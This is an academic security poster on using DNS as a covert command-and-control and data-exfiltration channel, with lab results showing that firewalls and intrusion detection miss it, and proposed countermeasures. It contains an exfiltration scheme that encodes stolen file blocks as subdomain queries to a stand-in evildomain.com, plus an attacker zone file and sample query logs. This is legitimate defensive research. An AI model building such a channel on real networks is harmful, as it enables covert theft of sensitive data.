NANOG32 - DNS Anomalies and Their Impacts on DNS Cache Servers
Minieri CS6262 Project Poster
1. jminieri@gatech.edu
Laboratory Environment
[Laboratory environment diagram: Corporate Name Server, Infected PC, Evil Name Server, Network Anomaly Detection System, Next-Generation Firewall, Network Intrusion Prevention System, Internet; flows labelled Data Exfiltration and Command & Control]
Conclusion & Countermeasures
Exfiltrating the Data
Infected Client:
1. Receives encrypted/encoded instructions from a DNS query (the TXT record for its clientid), decoding and then decrypting them:
“get SensitiveData.doc” = AES128Decrypt( id, Ksec, Base64Decode( “wq8Hx50ab4TGOaWwEBhZO...” ))
2. Performs the commands:
2a. Break SensitiveData.doc into blocks
2b. For each block: EncodedBlock = Base32Encode( AES128( id, Ksec, block ))
2c. Query EncodedBlock.evildomain.com
Evil Name Server:
1. Collects query logs for results:
query: 2ox4ttglxoxyxbrix2pbd4o4gtmkq56lakoo3pjnnhetwwibrlaa.evildomain.com IN A +
query: r7wbrme3udzoczqelfoqnx7qxysexynokg6eiotjy3mur7zrd3la.evildomain.com IN A +
query: zvev2wpzmfgcpbgboxi3yw3ivtgjaxf2eg3xumitf3xzetzn5uaa.evildomain.com IN A +
query: mzxnbmy73fjz6umqrgzstqatkm7ngifmdfxqwnnq52fekhzjod5a.evildomain.com IN A +
query: 4sjpqctnj6keacrt4jklpjpnyea67o76bgjyvjdj4odjcfngxlra.evildomain.com IN A +
query: 4hv2hu6ywklsclcs2xnsygrzmbpjz5ormdr27dfe24zwvglww5wa.evildomain.com IN A +
query: jrcnfvfxg7uieih7wtf3ecl3f2ux5f2zup2bwnrtm3fsv3cz7oca.evildomain.com IN A +
2. Reconstructs original data
Implementing a Stealthy C&C Channel
Infected Client:
1. Registers with the Evil Name Server and receives an ID (clientid)
2. Queries clientid.evildomain.com (TXT) for its instructions
Evil Name Server:
1. Populates TXT record for clientid with commands to execute
Base64Encode( AES128( id, Ksec, “get SensitiveData.doc”))
Background
Next-Generation Firewall
- Does not see the data exfiltration traffic as a threat
- Only records the DNS transactions as “traffic”, mixed with other legitimate DNS traffic
- No alerts that exfiltration occurred
Network Anomaly Detection
- Basic thresholds are too high to detect activity
- Pushing thresholds for a group/network low causes false positives
- Baselining individual hosts is inaccurate on networks using DHCP
Network Intrusion Prevention System
- Signature-based; no signatures exist for this type of traffic, so no alerts
- May record DNS queries in general, but those queries are mixed with legitimate DNS traffic
The modern network security infrastructure remains inadequate to protect networks from this vector of data loss.
Based on the advances in the areas of web content filtering and SPAM reduction, similar strategies should be employed for the filtering and blocking of suspicious or unauthorized DNS queries:
Focus on the domain name:
1. Domain Name Reputation Service
   - When was the domain registered? (recent = low reputation)
   - Who is the registrar? (are they reputable?)
   - How frequently are DNS records updated? (short TTL could suggest Fast Flux)
   - Age of the specific DNS record (new additions may be suspicious, old records may be trustworthy)
   - Links from known trusted sites (not search engines)
2. Domain Name Real-Time Black Hole Service
   - Implement a DNS-based blackhole list (DNSBL)
3. Domain Name Categorization Service
   - Domains are categorized based on content (similar to web content filtering)
   - Domain administrators allow/deny queries based on categorization
Focus on network behavior:
1. Unusually high volumes of DNS traffic
   - A baseline of what is usual needs to be determined
   - White list capability to allow known CDN traffic
   - Not good against small amounts of data
These services should be integrated directly into BIND; current services integrate with web content filtering or mail relays.
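As an added example (not part of the poster), the network-behavior approach above, a CDN white list plus a count of distinct leftmost labels per registered domain, run over a constructed excerpt in the same query-log format the poster shows; it also reproduces the lab finding that a bare hostname-entropy check flags cloudfront.net as well as evildomain.com. The allow list, the thresholds and the two-label approximation of a registered domain are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed query-log excerpt in the same BIND format as the poster's log lines.
SAMPLE_LOG = """\
query: a1ad0a23d76406ca643d9131e3cb41272.profile.jfk5.cloudfront.net IN A +
query: a872519f3b7190734526511bebb226f0e.profile.sin2.cloudfront.net IN A +
query: a7ec25bb89c4452fb63759d20363071f5.profile.ewr2.cloudfront.net IN A +
query: o2cmkso25fpbvm3h7qh7mjzmatjpve6u6gamlxbxj6pbhsufvgma.evildomain.com IN A +
query: dpasrf4e45duoma4cn37cmgcpafu6k4yqrt6gbm2nsnsg6anog3a.evildomain.com IN A +
query: rkd3cuxqbhneofaiu7g4ntqko5ksput6tm2yh5bxce6suwsert7q.evildomain.com IN A +
query: www.gatech.edu IN A +
"""

# Assumed allow list of CDN zones whose leftmost labels are legitimately random-looking.
CDN_ALLOWLIST = {"cloudfront.net"}
QUERY_RE = re.compile(r"query: (\S+) IN (\S+)")


def shannon_entropy(label):
    """Bits per character of a label: high for hex/base32 blobs, low for names like 'www'."""
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registered_domain(fqdn):
    # Two-label approximation (assumption; production code would use the public suffix list).
    return ".".join(fqdn.rstrip(".").split(".")[-2:])


def parse_queries(log_text):
    return [m.group(1) for m in QUERY_RE.finditer(log_text)]


def score_domains(log_text, min_unique_labels=3, min_entropy=3.0):
    """Per registered domain: 'entropy_flag' is what a bare entropy detector raises;
    'suspicious' also requires the zone to be off the CDN allow list (removes the CDN false positive)."""
    labels_by_domain = defaultdict(set)
    for fqdn in parse_queries(log_text):
        labels_by_domain[registered_domain(fqdn)].add(fqdn.split(".")[0])
    report = {}
    for domain, labels in labels_by_domain.items():
        mean_entropy = sum(shannon_entropy(l) for l in labels) / len(labels)
        entropy_flag = len(labels) >= min_unique_labels and mean_entropy >= min_entropy
        report[domain] = {"unique_labels": len(labels), "mean_entropy": round(mean_entropy, 2),
                          "entropy_flag": entropy_flag, "suspicious": entropy_flag and domain not in CDN_ALLOWLIST}
    return report
```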
Covert Channel – clandestine use of a shared resource to exchange information (e.g. tweaking bits in an IP header, hiding a file in a cake!)
Domain Name Service – a ubiquitous system providing hostname to IP lookup services for devices connecting to the Internet. (e.g. www.gatech.edu -> 130.207.160.29)
Why DNS as a covert channel?
- It’s used on every network connecting to the Internet
- Security administrators must allow DNS traffic to ingress/egress a network perimeter
- RFCs specify many flexible record types
- Many software vendors and content providers utilize this flexibility in the delivery of their products
Due to the assorted legitimate uses of DNS and the variety of query and response record formats required by the RFCs, detecting compliant but malicious DNS queries and responses is difficult!
[Screenshot callouts: Network Anomaly Detection System; Next-Generation Firewall. RFC-compliant DNS transactions are all grouped together. No threats detected, just DNS traffic captured.]
evildomain.com zone file (as served by the Evil Name Server):
$ORIGIN evildomain.com.
$TTL 3600
@       IN SOA ns.evildomain.com. root.evildomain.com. (
                2013031101 ; serial (YYYYMMDDnn; must fit in 32 bits)
                900        ; refresh
                600        ; retry
                86400      ; expiry
                3600 )     ; minimum
        IN NS  ns.evildomain.com.
; A 192.168.1.1
;
ns      IN A   192.168.1.1
;
www     IN A   172.16.1.1
1234567890123456 IN TXT "wq8Hx50ab4TGOaWwEBhZOH/92EiiH3UgDpWj6FdBUNE="
1234567890123456 IN A   172.16.1.66
*       IN A   172.16.1.66
Annotations: the TXT record holds the encrypted command for clientid 1234567890123456; the DNS wildcard record prevents NXDOMAIN responses as clients exfiltrate data.
Searching DNS Query Logs:
query: a1ad0a23d76406ca643d9131e3cb41272.profile.jfk5.cloudfront.net IN A +
query: a872519f3b7190734526511bebb226f0e.profile.sin2.cloudfront.net IN A +
query: a7ec25bb89c4452fb63759d20363071f5.profile.ewr2.cloudfront.net IN A +
query: ad572852c5270fac72fd9d8b2cfd3d306.profile.sin2.cloudfront.net IN A +
query: a875e52d696ae8e0ce28cd36a213daa57.profile.mia50.cloudfront.net IN A +
query: a18045c17467024a514b0ab79ecaa58e0.profile.sfo9.cloudfront.net IN A +
query: afa9724d8183a5f1c35353150682a23db.profile.sin3.cloudfront.net IN A +
query: af7575720d6325c162aa90008428ac27b.profile.iad12.cloudfront.net IN A +
query: a6e4c5b345cf0cbb25bf2711448bef95c.profile.fra6.cloudfront.net IN A +
query: a0a2a114aa395186ad2454d65879b9f7a.profile.jfk6.cloudfront.net IN A +
query: a42ce5df4536f21e11771d686469c6645.profile.lhr5.cloudfront.net IN A +
query: a5b3b21b9270043c539cfeabf26187996.profile.jfk1.cloudfront.net IN A +
query: a93b6a052e8c62437184f95a46227f1ae.profile.sea50.cloudfront.net IN A +
query: a9bc2b695ffb0e4a6d263be602bc27dfe.profile.stl2.cloudfront.net IN A +
query: a437f389280fe78c662d69017428c10d5.profile.syd1.cloudfront.net IN A +
query: a2fe3288bc1cf62ba63001dddfdcdb6ad.profile.nrt53.cloudfront.net IN A +
query: o2cmkso25fpbvm3h7qh7mjzmatjpve6u6gamlxbxj6pbhsufvgma.evildomain.com IN A +
query: dpasrf4e45duoma4cn37cmgcpafu6k4yqrt6gbm2nsnsg6anog3a.evildomain.com IN A +
query: rkd3cuxqbhneofaiu7g4ntqko5ksput6tm2yh5bxce6suwsert7q.evildomain.com IN A +
query: y4gaqwy7fz2nznmvlrpcjdmlgqxh2qec2sdz5n6yjgcm73lqpylq.evildomain.com IN A +
query: 7z74bbryi4evuc4zijblhf5eokttrel4sb7atuiiyezo4sp3ddhq.evildomain.com IN A +
query: v3nsmyoe4ip475ajbdjku3rjdt3s7innupyro57kdyra5y3z43oq.evildomain.com IN A +
query: xd6kkjm2jzzgbdf5mockkwetmmouqqlfw77nvn2g55bd4moktw3q.evildomain.com IN A +
query: gwunhw52v7v2ukfnhjxfq6uuk5nx4klciyqoyrza46w464q636qa.evildomain.com IN A +
query: da2xcedrixvwodam5el3pqh4prjck6hkghdzvsyulctitxvd3tgq.evildomain.com IN A +
query: kda3bxbc4rjsyyt2pcbdcqwnpm2ing5effvp24kbpgpvrnklio2a.evildomain.com IN A +
query: nfcsd7eylchbysavyd226vewp7si2wapigztpngug2mwjqdzetqq.evildomain.com IN A +
query: fktl5gt5whuzjof6rjdd4p4nl2n4tc6a725x6z4ojnmsfitsdpkq.evildomain.com IN A +
query: rhucuss5ltvl6ro6fihbezjfaicylazfswe5p5hv6eum353dkzla.evildomain.com IN A +
query: 7br6hg23wbzxya7oupimz5ofq57krsw4ahvblfqsodt2r4nkjunq.evildomain.com IN A +
query: 5rft2mx4lejdjccmemwqgdfykbwpgfku4sev2kb6rzs7adl4cxcq.evildomain.com IN A +
query: ntqa7b4n434zqbwdndxgq2xkxd5ws4daerqbhtrobess4uqq6ovq.evildomain.com IN A +
Exfiltrated data looks too much like normal content delivery network traffic; hostname entropy detection yields false positives.
Network Intrusion Prevention System: only DNS queries are detected, no DNS-based threats; there is too much query traffic to sort through.
DNS traffic shows an increase in the flow report, but the overall volume of traffic is too low to generate an alert or cause analysts to notice.